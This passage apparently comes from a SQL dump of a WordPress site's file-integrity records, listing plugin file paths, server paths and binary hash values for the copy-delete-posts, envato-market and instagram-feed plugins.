]ue','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*b4ixT^','fmW(-5HzĕB^nغ','',0,'?'),('9^I|nx~~M','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/part-install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/part-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C81͹̛','\rGYHגArfL1XW','',0,'?'),('TVS OLk','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/part-upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/part-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','،!nK','LԗwbKPVuma ݿm\ZGZ','',0,'?'),('xp24-LB','wp-content/plugins/copy-delete-posts/banner/views/projects/usm/upgrade.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/usm/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZzU]','œl3+ޏr#m<(8\"Mz9G','',0,'?'),('BN+f{pc $','wp-content/plugins/copy-delete-posts/banner/views/static/imgs/already-installed.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/imgs/already-installed.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' `EZ Zs','K:~LrDBW/\"-*','',0,'?'),('4J~q&*A\r$','wp-content/plugins/copy-delete-posts/banner/views/static/imgs/check-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/imgs/check-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!k*N','f+7zjͱ]i+>Ӎv','',0,'?'),('^DJfI@','wp-content/plugins/copy-delete-posts/banner/views/static/imgs/clock-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/imgs/clock-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L;VI8 ̻WQl','\Z`;WĪKG4HF\n;','',0,'?'),(':ȳkՕ','wp-content/plugins/copy-delete-posts/banner/views/static/imgs/rating.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/imgs/rating.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z}&.~Wj','<]5D\'ΏS2\'[>','',0,'?'),('gQDYo1','wp-content/plugins/copy-delete-posts/banner/views/static/imgs/white-arrow-right.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/imgs/white-arrow-right.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6狺^$|','_>h_P߁AB]Eӱ_','',0,'?'),('|qJU)','wp-content/plugins/copy-delete-posts/banner/views/static/tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/static/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߞX[#a','#\Z\"AʧM,LC gѼ^m','',0,'?'),('Wtc','wp-content/plugins/copy-delete-posts/copy-delete-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/copy-delete-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vx/Hr퍬\nMݎ','{{)$\Z o|7oedJ','',0,'?'),('iy(U!Q','wp-content/plugins/copy-delete-posts/menu/configuration.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/menu/configuration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.#5#%','bgmhwM$Sa','',0,'?'),('&pae#9X','wp-content/plugins/copy-delete-posts/menu/modal.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/menu/modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gS3 K','Sg#.A8;\ZzצS&vai','',0,'?'),('NJ&~%','wp-content/plugins/copy-delete-posts/menu/notifications.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/menu/notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m\'FZ*nF% ','bf9jXOmEξOy.#','',0,'?'),('rB]Hz','wp-content/plugins/copy-delete-posts/menu/tooltips.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/menu/tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȏe aQ#','E&vgD蘔?b)H,v 6','',0,'?'),('`DbF','wp-content/plugins/copy-delete-posts/menu/variables.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/menu/variables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0AhsO','.5n:A~j ,HUVB+2','',0,'?'),('kfec','wp-content/plugins/copy-delete-posts/modules/review/assets/css/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n$i{8x\\Z 8','wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/background-pattern.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/background-pattern.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6=}\n}DȐ','qIbf[C3iv1Z\0WP93j','',0,'?'),('26Bd(~','wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image-part-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image-part-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':<~~T;YD','F7p\\Wn{H.\\','',0,'?'),('u\n0Z;@RL','wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image-part-4.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image-part-4.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')w0Nl~/QE','9{IRjF |EgeR&BJ ','',0,'?'),('C\'rU~lrHN','wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/imgs/main-image.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`1_C;\'','-vNa2Q(\nUjN4J\r#','',0,'?'),('.%\07\'{','wp-content/plugins/copy-delete-posts/modules/review/assets/js/script.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/assets/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS\r Xڴ','jj\Zനo> b[f','',0,'?'),('Ll`cc7 K$','wp-content/plugins/copy-delete-posts/modules/review/review.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/review/review.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1%hmG=','P<.\'/עq!J{JYh۷','',0,'?'),('EU354 ','wp-content/plugins/copy-delete-posts/modules/tryOutPlugins/tryOutPlugins.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/modules/tryOutPlugins/tryOutPlugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','loUz[B%@','/; *@p_X u5yJ','',0,'?'),('ܠ&d3N','wp-content/plugins/copy-delete-posts/post/handler.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/post/handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϥl\r!1>O2','`{hla(J^R','',0,'?'),('u\'aKH?=s֓N\Z','wp-content/plugins/copy-delete-posts/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<[^֏)W','\\`Qr#6\nX6W\"S','',0,'?'),('_aC  ','wp-content/plugins/envato-market/envato-market.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/envato-market.php',0,'1{\0 r$l','1{\0 r$l',')-X|nxÅRhT eU>{\nF','',0,'?'),('5җt\n$* ]L','wp-content/plugins/envato-market/fonts/envato-market.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/fonts/envato-market.svg',0,'ߴW=2va','ߴW=2va','6sa`jp\Zm9%ȯ $Y.\'2','',0,'?'),('0U$qr','wp-content/plugins/envato-market/images/envato-market-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/images/envato-market-logo.svg',0,'WI=cE,','WI=cE,','\'B9 s$]\\|t}r<','',0,'?'),('6`ehp\0K','wp-content/plugins/envato-market/inc/admin/class-envato-market-admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/class-envato-market-admin.php',0,'QTH\nO','QTH\nO','YSR 5S 3#S\" \"tDWuͩ','',0,'?'),('|䦤a(ѥz{?','wp-content/plugins/envato-market/inc/admin/class-envato-market-theme-installer-skin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/class-envato-market-theme-installer-skin.php',0,'.byGy7 P \\','.byGy7 P \\','X`VF>Eɢ%VPX\n\n;','',0,'?'),('e_M۷:_(','wp-content/plugins/envato-market/inc/admin/class-envato-market-theme-upgrader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/class-envato-market-theme-upgrader.php',0,'fޚo3,n߮S&','fޚo3,n߮S&','1?Ͱ0}r`ZZ>-','',0,'?'),('˄IYoѻ','wp-content/plugins/envato-market/inc/admin/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/functions.php',0,'c6JZ','c6JZ','u;9E6G1>#N\r]Э. 4','',0,'?'),('0#G`\\','wp-content/plugins/envato-market/inc/admin/view/callback/admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/callback/admin.php',0,'Ԛ(y: V','Ԛ(y: V','Ԫ}\rr8Q8a','wp-content/plugins/envato-market/inc/admin/view/notice/error-details.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error-details.php',0,'^(P]Պ:','^(P]Պ:','Ơt\rΎR R@cVJ}m','',0,'?'),('`To8m=','wp-content/plugins/envato-market/inc/admin/view/notice/error-http.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error-http.php',0,'\r龜:','\r龜:','T=.#MJ}zD!)o0AQ','',0,'?'),('5uQQ#\n','wp-content/plugins/envato-market/inc/admin/view/notice/error-missing-zip.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error-missing-zip.php',0,'{&1kn\Z!z5','{&1kn\Z!z5','I)4(vZ~Ч~,6\Z','',0,'?'),('ҵ ikN','wp-content/plugins/envato-market/inc/admin/view/notice/error-permissions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error-permissions.php',0,'/&=!?M','/&=!?M','=x.wA_?!H7Y','',0,'?'),('HWr\'2I','wp-content/plugins/envato-market/inc/admin/view/notice/error-single-use.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error-single-use.php',0,'HC-K~QpqI','HC-K~QpqI','.1B,2 6kW/+s*y0','',0,'?'),('Hsoqn??k0΍','wp-content/plugins/envato-market/inc/admin/view/notice/error.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/error.php',0,'[ՙkJr„','[ՙkJr„',';0֌L13Q2$\rA܎vǪ','',0,'?'),('( Zm+|5','wp-content/plugins/envato-market/inc/admin/view/notice/success-no-items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/success-no-items.php',0,'l\r\Zf:','l\r\Zf:','ZB ?c^`iQ]:Hk','',0,'?'),('\r~ ĉ`','wp-content/plugins/envato-market/inc/admin/view/notice/success-single-use.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/success-single-use.php',0,'kNj䍼efk','kNj䍼efk','`Y2x\Zr&Wntm|b','',0,'?'),('\\mCIIjrm','wp-content/plugins/envato-market/inc/admin/view/notice/success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/notice/success.php',0,'CF_) \"J','CF_) \"J','}4yK,2BodSiY䞱p','',0,'?'),('(c.6?Ǖ=','wp-content/plugins/envato-market/inc/admin/view/partials/help.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/admin/view/partials/help.php',0,'2FfhfgH','2FfhfgH',' 9g̠','',0,'?'),('\"Y@w쒗','wp-content/plugins/envato-market/inc/class-envato-market.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/inc/class-envato-market.php',0,'ZK܃aY%[','ZK܃aY%[','/^q_ItN`ۙfq a','',0,'?'),(' Ik7[.#g&\0','wp-content/plugins/envato-market/js/envato-market.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/js/envato-market.js',0,'^?3~[','^?3~[','%)#~ VSgm-v','',0,'?'),('ɵ\'A0_}\0Q','wp-content/plugins/envato-market/js/envato-market.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/js/envato-market.min.js',0,'8{C‹/','8{C‹/','Fdְ}Iޫ)AoD\\G.d','',0,'?'),('yD]5s/py?%','wp-content/plugins/envato-market/js/updates.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/js/updates.js',0,'/m쵗}9','/m쵗}9','JMI: {FE)#G7','',0,'?'),('=Qt~3KJ','wp-content/plugins/envato-market/js/updates.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/envato-market/js/updates.min.js',0,'LiٔS2F\0>7','LiٔS2F\0>7','ΨcC=+wN&u[^n<[U\"kRG','',0,'?'),(' 0*W','wp-content/plugins/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/index.php',0,'gD,V=\\bP','gD,V=\\bP','k~ UH\ZxPĀ<;X','',0,'?'),('ߴCΝm0 \"','wp-content/plugins/instagram-feed/README.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/README.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HgJ\0r9C','+R+~ॷ3\"wӐ2$!8#q/','',0,'?'),('g(S\Z9@r{R','wp-content/plugins/instagram-feed/admin/SBI_About_Us.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_About_Us.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(l','wp-content/plugins/instagram-feed/admin/SBI_Response.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[vlN9HXa','fu]QG:ZI \r41/@','',0,'?'),('I+a2wo\n+','wp-content/plugins/instagram-feed/admin/SBI_Support.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_Support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~3%aZJ dmM,',':G0SSt&yW޵\\>|_ovgb\"]','',0,'?'),('7Q\0A/','wp-content/plugins/instagram-feed/admin/SBI_Support_Tool.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_Support_Tool.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c4gh0','/8F?W2)YDyT7h','',0,'?'),('f@Щ@I8ˣH','wp-content/plugins/instagram-feed/admin/SBI_Upgrader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_Upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wazԣ:3%','?#4I@`t2^LR1OT','',0,'?'),('n*<>\'e[','wp-content/plugins/instagram-feed/admin/SBI_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}$1r>kr2)FS','[SgQ9*G]ɀm.(','',0,'?'),('q?vI>','wp-content/plugins/instagram-feed/admin/SBI_oEmbeds.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/SBI_oEmbeds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','24*Js^j^','8-Bqmiz`nmRu̕U~','',0,'?'),('ɥٸ^-Nw\ZZ_','wp-content/plugins/instagram-feed/admin/Traits/SBI_Settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/Traits/SBI_Settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A-x\0','}jM\">?%´SN','',0,'?'),('%^(g^WnB','wp-content/plugins/instagram-feed/admin/assets/css/about.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Um2^P','}Am(/!(','',0,'?'),('|˹a gE!9S','wp-content/plugins/instagram-feed/admin/assets/css/admin-notifications.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/css/admin-notifications.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','by]@-vd','wa4d2zz[pd^\'\Z6,','',0,'?'),('Gj?˕&Ot','wp-content/plugins/instagram-feed/admin/assets/css/oembeds.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/css/oembeds.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%|㯞+v','0E+ U/^[nS','',0,'?'),('7,8*z7I','wp-content/plugins/instagram-feed/admin/assets/css/settings.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/css/settings.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԗ0Kڽm%8{','\nکQE)8\04$.+lr{]1','',0,'?'),('{:0GM;fn','wp-content/plugins/instagram-feed/admin/assets/css/support.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/css/support.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrxX','%&R\n@i}t*AG=6I[ eM/YA','',0,'?'),('8Jޣ\'{','wp-content/plugins/instagram-feed/admin/assets/img/about/api-error.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/api-error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yV;c><*','^GkProʽE#\'NL','',0,'?'),('<,Z\rZ˚-\"','wp-content/plugins/instagram-feed/admin/assets/img/about/icon-full.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/icon-full.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','黂#y\ZI;','xAݵyO3CrGd[~','',0,'?'),('g\Z]C','wp-content/plugins/instagram-feed/admin/assets/img/about/icon-none.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/icon-none.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\L4ț7qM4~Gn','^ci/} (QE2w','',0,'?'),('R\nZB@1h8\0','wp-content/plugins/instagram-feed/admin/assets/img/about/icon-partial.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/icon-partial.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52Zë)','PzDa쑯#Nzꁵ^\n','',0,'?'),('Pp\0U','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-affwp.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-affwp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$LX +if','g@1X료Et|+sg ʰDdȪq','',0,'?'),(' O\Zv4','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-charitable.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-charitable.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#yHpz0#','/]?c+iϿHt6\0&','',0,'?'),('?AmD.iuT','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-edd.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-edd.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AL 5N< E^','=,o/F`.˹n,_o8','',0,'?'),('VcI\n=4I','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-if.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-if.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5]EI!ՙ','gM5+!di#\0ײ&,Y&','',0,'?'),('۴MV\ZW','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-mi.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-mi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n%u=1}<','뜖)g0pi v^h7','',0,'?'),('ڠ#zE h])\n','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-om.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-om.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4lY<&s>r','-9 kZ=Rg[C.븘','',0,'?'),('1Y5槗9aIE','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-pushengage.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-pushengage.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xn\0uf0J\'0','L1F&(ł \Z\"','',0,'?'),('(xZu +','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-rp.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-rp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v$eHGHD','.^&O\'{6\0ZtKf5\Zlj?,','',0,'?'),('(b!3 *C','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-searchwp.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-searchwp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.}ނ+f$ãmK<','T\rќb>tY i`Q7 &z','',0,'?'),('Xp{AU$\0މ\ZD','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-seedprod.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-seedprod.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nHNSN p1','?>g g\\)l<ܖ/xv','',0,'?'),(' 1V','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-seo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-seo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}KR','[5W|rPbV )\\vMFm͌','',0,'?'),('s-J5','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-smtp.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-smtp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BtVI.в','af\rg~t6%\\ ƈ`S{0\\Gf\r','',0,'?'),('\0Q&fa P','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-sugarcalendar.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-sugarcalendar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','н< ҍeA','~]\".:t\rB*,,\nM\"|pu','',0,'?'),('(}2&G a(i','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-trustpulse.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-trustpulse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YbjL\0U','g<[ڒi;R/zgNZp','',0,'?'),('*s^(,8[1','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-tw.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-tw.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_du qCX0','c0F`λ=#/xȘi\r)','',0,'?'),('c4:5Eɏk','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wp-simple-pay.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wp-simple-pay.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l) uQ[','^\r,gvLF4ۤ}=)','',0,'?'),('LZwyW','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wpcode.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wpcode.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HGiV|/','#篵Hy1tRO^0^!','',0,'?'),('#\"??Nˤ Hh','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wpforms.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-wpforms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' }FI)\\y','ŽaUw~y q1bЮN u}','',0,'?'),('7u,8n[{X?$','wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-yt.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/about/plugin-yt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`8\")Ua[','DE]a°Z*2 |e\'&9.mt','',0,'?'),('\0ܻ)Is9^\"B[','wp-content/plugins/instagram-feed/admin/assets/img/balloon-120.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/balloon-120.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FڇqI}x+','u<ܝWҟzoB\0U~aH','',0,'?'),('Yڥ\\̉`T(ft','wp-content/plugins/instagram-feed/admin/assets/img/balloon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/balloon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ږq/{_,\r','STrpT$^i','',0,'?'),('ԩ2-k,Ɓv?','wp-content/plugins/instagram-feed/admin/assets/img/cff-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/cff-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l !c)','IS+YCDG=Z~%c֊','',0,'?'),(' 2- ޯ!gL','wp-content/plugins/instagram-feed/admin/assets/img/cff-sprite.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/cff-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m2ɝN\0\n{o[',';zۑO`2;%\n','',0,'?'),('\0<Q','wp-content/plugins/instagram-feed/admin/assets/img/facebook-color-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/facebook-color-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?@3@ E\ncʱ','S\"3-nM=p#','Ⱥʺt&Wl]HP-j?{`}','',0,'?'),(',W@p@tG%̟','wp-content/plugins/instagram-feed/admin/assets/img/group-app.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/group-app.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t9#_k','.Br,\rˌp#d9Li`ElBE','',0,'?'),('SrUſ','wp-content/plugins/instagram-feed/admin/assets/img/insta-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/insta-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','< Y_谩*^','˰ay\Zz^w­g_','',0,'?'),('E5)sc%','wp-content/plugins/instagram-feed/admin/assets/img/instagram-color-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/instagram-color-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\'p28?^','$rܤ7h;z\\Pdju4s8E݇se','',0,'?'),('М[ywL_u','wp-content/plugins/instagram-feed/admin/assets/img/instagram-icon.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/instagram-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FTĖP#^Ix','pVEM/;!Rn7cp!','',0,'?'),('bh{?lOI','wp-content/plugins/instagram-feed/admin/assets/img/instagram-with-uncanny-automator.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/assets/img/instagram-with-uncanny-automator.png',1,'\0\0\